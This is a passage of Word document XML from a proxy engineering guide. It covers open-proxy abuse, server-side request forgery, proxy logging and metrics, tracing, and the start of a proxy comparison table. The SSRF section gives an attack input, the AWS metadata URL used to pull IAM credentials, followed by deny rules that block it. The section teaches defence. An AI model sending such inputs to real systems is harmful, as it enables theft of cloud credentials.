        <w:t>Hide their identity when attacking other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E4FC4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="702"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Send spam through your IP (you get blacklisted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6EB72" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="702"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Access internal resources through your network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7334B5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="702"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Bypass geo-restrictions or sanctions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B9B163" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to prevent accidental open proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6EE31" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Bind proxy to internal interfaces only (not 0.0.0.0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557CB5BA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Require authentication for forward proxy access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5477F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Restrict allowed destination IPs (block internal ranges like 10.0.0.0/8, 172.16.0.0/12).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A0416" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="703"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Restrict allowed ports (only 80, 443 — not arbitrary ports).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB87ED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 Server-Side Request Forgery (SSRF) via Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A50F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D70BA3E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If a reverse proxy/application fetches URLs based on user input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A5C44C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Attacker sends request with internal URL: http://169.254.169.254/latest/meta-data/ (AWS metadata endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A688768" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy/application fetches this URL from its OWN network perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F548E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="704"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Internal metadata (IAM credentials, instance info) is returned to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBB922" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation at the proxy level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA1642" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Block requests to RFC 1918 addresses (10.x, 172.16–31.x, 192.168.x) from user-triggered fetches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34B1B3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Block link-local addresses (169.254.x.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92040E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Block cloud metadata endpoints explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB279CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Whitelist allowed destination domains/IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7C32D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Use IMDSv2 (requires token-based access to metadata — can't be accessed via simple GET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807928D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="1A27EF2F">
          <v:rect id="_x0000_i3334" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E1924" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Proxy Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176765D4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 What to Log at the Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA3122" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access log fields (for every request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FBCB42" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B157A7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">timestamp | client_ip | method | path | protocol | status_code | </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C6FBD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>response_size | response_time | upstream_server | upstream_response_time |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7B034" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>request_id | user_agent | referer | tls_version | tls_cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F8F30" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why upstream_response_time matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474E52D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>response_time = total time client experienced. upstream_response_time = time the backend took.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2388C6CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Difference = proxy overhead (TLS, buffering, queueing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F0C3F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If response_time is high but upstream_response_time is low → proxy is the bottleneck. If upstream_response_time is high → backend is slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5B70F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 Metrics to Export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0CA30D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RED metrics (Rate, Errors, Duration):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7F315" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Requests per second (total, per backend, per route).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18951970" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Errors:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Error rate by status code (4xx, 5xx), by backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFDA8FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Duration:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Response time histograms (p50, p95, p99), per route, per backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048E0CD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E51214" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Active connections (client-side and backend-side).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF381E6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection pool utilization per backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CB3F54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Retry rate, circuit breaker trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24494D36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>TLS handshake time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B23E656" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Request queue depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48434B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="707"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Bandwidth in/out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A43C0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.3 Distributed Tracing Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215FCBC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The proxy's role in tracing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D85EC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If incoming request has no trace header → generate a trace ID. Inject X-Request-ID or W3C traceparent header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30578F78" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If incoming request HAS a trace header → propagate it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27B52E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Create a span for the proxy's processing (timestamps: received, forwarded, response received, response sent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E5D3B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Report the span to the tracing backend (Jaeger, Zipkin, OpenTelemetry Collector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B9120" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The entire request path (through all proxies and services) is visible as a single trace. You can see exactly where time is spent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556B59A8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="090FACE7">
          <v:rect id="_x0000_i3335" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B647D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Comparison of Major Proxy Technologies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742"/>
        <w:gridCol w:w="1743"/>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="1301"/>
        <w:gridCol w:w="1439"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="6B5335D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2ADCCF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature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65E364" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nginx</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D14646" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Envoy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81C831" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HAProxy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E9D4B3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Traefik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9182C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Caddy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="53A1EFC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45EE6B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Architecture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D87362" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Multi-process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CF61D3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Multi-thread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E8B2CC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Multi-thread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1FF91B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Single binary (Go)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A42EBE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Single binary (Go)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="50F3D14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77E349" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Config reload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571A06" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Graceful (new workers)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8E1BFD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Hot restart / xDS dynamic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D4A183" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Graceful reload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44E7F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Dynamic (API/file watch)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830216" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Dynamic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="65A339C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B11924" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Service discovery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1E4D54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>DNS/static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893B6C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>xDS API (dynamic)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B98902" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>DNS/static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C9E559" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>K8s, Consul, etc. native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705614" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1C75A75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ED1CC1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:lastRenderedPageBreak/>
              <w:t>L4 + L7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74E331" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Both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3CA8CA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
